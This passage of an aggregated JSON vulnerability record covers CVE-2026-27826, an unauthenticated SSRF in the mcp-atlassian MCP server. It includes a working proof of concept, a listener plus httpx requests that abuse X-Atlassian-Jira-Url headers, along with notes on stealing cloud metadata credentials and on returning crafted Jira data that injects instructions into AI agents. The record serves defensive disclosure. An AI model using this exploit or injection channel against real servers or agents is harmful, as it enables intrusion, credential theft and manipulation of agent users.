JIRA_API_TOKEN=placeholder \\\n mcp-atlassian --transport streamable-http --port 8000\n\n Step 3 — Trigger the SSRF:\n\n import httpx, json\n\n MCP = \"http://localhost:8000/mcp\"\n ATTACK = \"http://:8888\"\n\n # Initialize MCP session\n r = httpx.post(MCP, json={\n \"jsonrpc\": \"2.0\", \"method\": \"initialize\",\n \"params\": {\"protocolVersion\": \"2024-11-05\", \"capabilities\": {},\n \"clientInfo\": {\"name\": \"poc\", \"version\": \"1.0\"}},\n \"id\": 1\n }, headers={\n \"X-Atlassian-Jira-Url\": ATTACK,\n \"X-Atlassian-Jira-Personal-Token\": \"any-value\",\n # No Authorization header — this is the key condition\n })\n sid = r.headers.get(\"mcp-session-id\")\n\n # Call any Jira tool — this triggers get_jira_fetcher() and the outbound SSRF call\n httpx.post(MCP, json={\n \"jsonrpc\": \"2.0\", \"method\": \"tools/call\",\n \"params\": {\"name\": \"jira_get_issue\", \"arguments\": {\"issue_key\": \"PROJ-1\"}},\n \"id\": 2\n }, headers={\n \"X-Atlassian-Jira-Url\": ATTACK,\n \"X-Atlassian-Jira-Personal-Token\": \"any-value\",\n \"Mcp-Session-Id\": sid,\n })\n\n The listener will receive GET /rest/api/2/myself originating from the MCP server process, confirming the SSRF.\n\n\n### Impact\nThis vulnerability affects any deployment using `--transport streamable-http` or `--transport sse`. The default HOST=0.0.0.0 binding exposes the HTTP endpoint to any host on the same network without any configuration change, and to the internet when deployed on a cloud instance.\n\n - Any HTTP deployment: The server acts as an SSRF proxy, enabling reconnaissance of internal services (databases, internal APIs, microservices)\n not directly reachable from outside the network.\n - AI agent sessions: Once the attacker-controlled fetcher is cached in request.state, all Jira tool responses for that session originate from the attacker's server. The attacker can return crafted API responses containing LLM instructions, injecting those instructions into the AI agent's context as if they were legitimate Jira data - a prompt injection channel at the data layer requiring no tool parameter manipulation.\n - Cloud deployments: Any network-reachable attacker can potentially steal the server's IAM role credentials via the instance metadata service, gaining full access to all cloud resources that role permits.", "title": "github - https://github.com/advisories/GHSA-7r34-79r5-rcc9" }, { "category": "description", "text": "### Summary\nAn unauthenticated attacker who can reach the mcp-atlassian HTTP endpoint can force the server process to make outbound HTTP requests to an arbitrary attacker-controlled URL by supplying two custom HTTP headers without an `Authorization` header. No authentication is required. The vulnerability exists in the HTTP middleware and dependency injection layer — not in any MCP tool handler - making it invisible to tool-level code analysis. In cloud deployments, this could enable theft of IAM role credentials via the instance metadata endpoint (`169.254.169.254`). In any HTTP deployment it enables internal network reconnaissance and injection of attacker-controlled content into LLM tool results.\n\n### Details\nThe server supports a multi-tenant HTTP authentication mode where clients supply per-request Jira/Confluence URLs via custom headers. The middleware (`src/mcp_atlassian/servers/main.py:436–448`) extracts `X-Atlassian-Jira-Url` from the request and stores it in request state with no validation. The dependency provider (`src/mcp_atlassian/servers/dependencies.py:189–217`) then uses this value directly as the `url=` parameter when constructing a `JiraConfig` and `JiraFetcher`. The first method call on the fetcher (`get_current_user_account_id()`) immediately issues a `GET` request to `{header_url}/rest/api/2/myself` — an outbound SSRF call to the attacker-controlled URL.\n\nNo comparison is made against the server-configured `JIRA_URL` environment variable. No private IP range blocklist is applied. No URL scheme allowlist is enforced.\n\n **Trigger conditions — all four must hold:**\n 1. Server running with `--transport streamable-http` or `--transport sse`\n 2. Request contains `X-Atlassian-Jira-Url` header (any non-empty value)\n 3. Request contains `X-Atlassian-Jira-Personal-Token` header (any non-empty value)\n 4. Request has **no** `Authorization` header\n\n An identical vulnerability exists for Confluence at `dependencies.py:341–393` via `X-Atlassian-Confluence-Url` +\n `X-Atlassian-Confluence-Personal-Token`.\n\n **Root cause - middleware** (`src/mcp_atlassian/servers/main.py:436–448`):\n ```python\n # When service headers are present and no Authorization header is provided,\n # auth type is set to \"pat\" but user_atlassian_token is NOT set.\n # This is what routes execution to the vulnerable path below.\n if service_headers and (jira_token_str and jira_url_str):\n scope[\"state\"][\"user_atlassian_auth_type\"] = \"pat\"\n\n Root cause - dependency provider (src/mcp_atlassian/servers/dependencies.py:189–217):\n if (\n user_auth_type == \"pat\"\n and jira_url_header # attacker-controlled, no validation\n and jira_token_header\n and not hasattr(request.state, \"user_atlassian_token\")\n ):\n header_config = JiraConfig(\n url=jira_url_header, # used directly, no allowlist check\n personal_token=jira_token_header,\n ...\n )\n header_jira_fetcher = JiraFetcher(config=header_config)\n header_jira_fetcher.get_current_user_account_id()\n # ^ GET {jira_url_header}/rest/api/2/myself — outbound SSRF call\n request.state.jira_fetcher = header_jira_fetcher # cached for all tool calls this request\n\n\n### PoC\nStep 1 - Start a listener to capture the inbound SSRF request:\n\n # listener.py\n from http.server import HTTPServer, BaseHTTPRequestHandler\n import json, sys\n\n class Handler(BaseHTTPRequestHandler):\n def do_GET(self):\n print(f\"[SSRF RECEIVED] Path: {self.path}\", file=sys.stderr)\n print(f\"[SSRF RECEIVED] Headers: {dict(self.headers)}\", file=sys.stderr)\n self.send_response(200)\n self.send_header(\"Content-Type\", \"application/json\")\n self.end_headers()\n if \"myself\" in self.path:\n self.wfile.write(json.dumps({\n \"accountId\": \"ssrf-confirmed\",\n \"displayName\": \"SSRF PoC\"\n }).encode())\n else:\n self.wfile.write(b\"{}\")\n def log_message(self, *args): pass\n\n HTTPServer((\"0.0.0.0\", 8888), Handler).serve_forever()\n\nStep 2 - Start mcp-atlassian in HTTP transport mode (placeholder credentials are sufficient — the vulnerable path is reached before any real Atlassian instance is contacted):\n\n JIRA_URL=https://placeholder.atlassian.net \\\n JIRA_API_TOKEN=placeholder \\\n mcp-atlassian --transport streamable-http --port 8000\n\n Step 3 — Trigger the SSRF:\n\n import httpx, json\n\n MCP = \"http://localhost:8000/mcp\"\n ATTACK = \"http://:8888\"\n\n # Initialize MCP session\n r = httpx.post(MCP, json={\n \"jsonrpc\": \"2.0\", \"method\": \"initialize\",\n \"params\": {\"protocolVersion\": \"2024-11-05\", \"capabilities\": {},\n \"clientInfo\": {\"name\": \"poc\", \"version\": \"1.0\"}},\n \"id\": 1\n }, headers={\n \"X-Atlassian-Jira-Url\": ATTACK,\n \"X-Atlassian-Jira-Personal-Token\": \"any-value\",\n # No Authorization header — this is the key condition\n })\n sid = r.headers.get(\"mcp-session-id\")\n\n # Call any Jira tool — this triggers get_jira_fetcher() and the outbound SSRF call\n httpx.post(MCP, json={\n \"jsonrpc\": \"2.0\", \"method\": \"tools/call\",\n \"params\": {\"name\": \"jira_get_issue\", \"arguments\": {\"issue_key\": \"PROJ-1\"}},\n \"id\": 2\n }, headers={\n \"X-Atlassian-Jira-Url\": ATTACK,\n \"X-Atlassian-Jira-Personal-Token\": \"any-value\",\n \"Mcp-Session-Id\": sid,\n })\n\n The listener will receive GET /rest/api/2/myself originating from the MCP server process, confirming the SSRF.\n\n\n### Impact\nThis vulnerability affects any deployment using `--transport streamable-http` or `--transport sse`. The default HOST=0.0.0.0 binding exposes the HTTP endpoint to any host on the same network without any configuration change, and to the internet when deployed on a cloud instance.\n\n - Any HTTP deployment: The server acts as an SSRF proxy, enabling reconnaissance of internal services (databases, internal APIs, microservices)\n not directly reachable from outside the network.\n - AI agent sessions: Once the attacker-controlled fetcher is cached in request.state, all Jira tool responses for that session originate from the attacker's server. The attacker can return crafted API responses containing LLM instructions, injecting those instructions into the AI agent's context as if they were legitimate Jira data - a prompt injection channel at the data layer requiring no tool parameter manipulation.\n - Cloud deployments: Any network-reachable attacker can potentially steal the server's IAM role credentials via the instance metadata service, gaining full access to all cloud resources that role permits.", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/PyPI%2FGHSA-7r34-79r5-rcc9.json?alt=media" }, { "category": "description", "text": "Affected versions of the mcp-atlassian package are vulnerable to Server-Side Request Forgery (SSRF) due to unvalidated user-supplied Atlassian service URLs. In src/mcp_atlassian/servers/main.py, the middleware accepts the X-Atlassian-Jira-Url and X-Atlassian-Confluence-Url headers without validation, and src/mcp_atlassian/servers/dependencies.py uses those values directly when constructing JiraConfig and the Confluence configuration, which leads get_current_user_account_id() to issue outbound requests such as GET {header_url}/rest/api/2/myself.", "title": "pyupio - https://raw.githubusercontent.com/pyupio/safety-db/refs/heads/master/data/insecure_full.json" }, { "category": "other", "text": "0.00052", "title": "EPSS" }, { "category": "other", "text": "3.9", "title": "NCSC Score" }, { "category": "other", "text": "Is related to a product by vendor Unknown, There is cwe data available from source Nvd", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5777014", "CSAFPID-5780881", "CSAFPID-5780882", "CSAFPID-5780883", "CSAFPID-5780884", "CSAFPID-5780885", "CSAFPID-5780886", "CSAFPID-5780887", "CSAFPID-5780888", "CSAFPID-5780889", "CSAFPID-5780890", "CSAFPID-5780891", "CSAFPID-5780892", "CSAFPID-5780893", "CSAFPID-5780894", "CSAFPID-5780895", "CSAFPID-5780896", "CSAFPID-5780897", "CSAFPID-5780898", "CSAFPID-5780899", "CSAFPID-5780900", "CSAFPID-5780901", "CSAFPID-5780902", "CSAFPID-5780903", "CSAFPID-5780904", "CSAFPID-5780905", "CSAFPID-5780906", "CSAFPID-5780907", "CSAFPID-5780908", "CSAFPID-5780909", "CSAFPID-5780910", "CSAFPID-5780911", "CSAFPID-5780912", "CSAFPID-5780913", "CSAFPID-5780914", "CSAFPID-5780915", "CSAFPID-5780916", "CSAFPID-5780917", "CSAFPID-5780918", "CSAFPID-5780919", "CSAFPID-5780920", "CSAFPID-5780921", "CSAFPID-5780922", "CSAFPID-5780923", "CSAFPID-5780924", "CSAFPID-5780925", "CSAFPID-5780926", "CSAFPID-5780927", "CSAFPID-5780928", "CSAFPID-5780929", "CSAFPID-5780930", "CSAFPID-5780931", "CSAFPID-5780932", "CSAFPID-5780933", "CSAFPID-5780934", "CSAFPID-5780935", "CSAFPID-5780936", "CSAFPID-5780937", "CSAFPID-5780938", "CSAFPID-5780939", "CSAFPID-5780940", "CSAFPID-5780941", "CSAFPID-5780942", "CSAFPID-5780943", "CSAFPID-5780944", "CSAFPID-5780945", "CSAFPID-5780946", "CSAFPID-5780947", "CSAFPID-5780948", "CSAFPID-5780949", "CSAFPID-5780950", "CSAFPID-5780951", "CSAFPID-5780952", "CSAFPID-5970924" ] }, "references": [ { "category": "external", "summary": "Source - nvd", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27826" }, { "category": "external", "summary": "Source raw - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-27826" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://www.cve.org/CVERecord?id=CVE-2026-27826" }, { "category": "external", "summary": "Source raw - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/27xxx/CVE-2026-27826.json" }, { "category": "external", "summary": "Source - github", "url": "https://github.com/advisories/GHSA-7r34-79r5-rcc9" }, { "category": "external", "summary": "Source raw - github", "url": "https://api.github.com/advisories/GHSA-7r34-79r5-rcc9" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/PyPI%2FGHSA-7r34-79r5-rcc9.json?alt=media" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27826" }, { "category": "external", "summary": "Source raw - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-7r34-79r5-rcc9" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - pyupio", "url": "https://raw.githubusercontent.com/pyupio/safety-db/refs/heads/master/data/insecure_full.json" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/sooperset/mcp-atlassian/commit/5cd697dfce9116ef330b8dc7a91291640e0528d9" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/sooperset/mcp-atlassian/security/advisories/GHSA-7r34-79r5-rcc9" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-7r34-79r5-rcc9" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-5777014", "CSAFPID-5780881", "CSAFPID-5780882", "CSAFPID-5780883", "CSAFPID-5780884", "CSAFPID-5780885", "CSAFPID-5780886", "CSAFPID-5780887", "CSAFPID-5780888", "CSAFPID-5780889", "CSAFPID-5780890", "CSAFPID-5780891", "CSAFPID-5780892", "CSAFPID-5780893", "CSAFPID-5780894", "CSAFPID-5780895", "CSAFPID-5780896", "CSAFPID-5780897", "CSAFPID-5780898", "CSAFPID-5780899", "CSAFPID-5780900", "CSAFPID-5780901", "CSAFPID-5780902", "CSAFPID-5780903", "CSAFPID-5780904", "CSAFPID-5780905", "CSAFPID-5780906", "CSAFPID-5780907", "CSAFPID-5780908", "CSAFPID-5780909", "CSAFPID-5780910", "CSAFPID-5780911", "CSAFPID-5780912", "CSAFPID-5780913", "CSAFPID-5780914", "CSAFPID-5780915", "CSAFPID-5780916", "CSAFPID-5780917", "CSAFPID-5780918", "CSAFPID-5780919", "CSAFPID-5780920", "CSAFPID-5780921", "CSAFPID-5780922", "CSAFPID-5780923", "CSAFPID-5780924", "CSAFPID-5780925", "CSAFPID-5780926", "CSAFPID-5780927", "CSAFPID-5780928", "CSAFPID-5780929", "CSAFPID-5780930", "CSAFPID-5780931", "CSAFPID-5780932", "CSAFPID-5780933", "CSAFPID-5780934", "CSAFPID-5780935", "CSAFPID-5780936", "CSAFPID-5780937", "CSAFPID-5780938", "CSAFPID-5780939", "CSAFPID-5780940", "CSAFPID-5780941", "CSAFPID-5780942", "CSAFPID-5780943", "CSAFPID-5780944", "CSAFPID-5780945", "CSAFPID-5780946", "CSAFPID-5780947", "CSAFPID-5780948", "CSAFPID-5780949", "CSAFPID-5780950", "CSAFPID-5780951", "CSAFPID-5780952", "CSAFPID-5970924" ] } ], "title": "CVE-2026-27826" } ] }